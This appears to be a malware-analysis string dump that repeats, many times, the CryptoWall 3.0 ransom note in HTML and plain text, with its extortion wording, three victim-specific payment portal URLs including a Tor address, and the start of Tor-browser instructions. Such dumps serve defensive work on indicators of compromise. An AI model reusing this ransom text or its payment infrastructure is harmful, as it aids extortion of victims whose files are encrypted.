Source: restore_files_gpmus.html133.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt308.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt107.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html194.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt316.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html135.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt420.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt398.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt260.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt25.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html104.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html146.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt299.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt160.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html185.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html250.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt51.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt61.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html361.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt347.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt78.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt340.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt105.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html150.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html168.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt393.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt198.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html88.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html145.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do 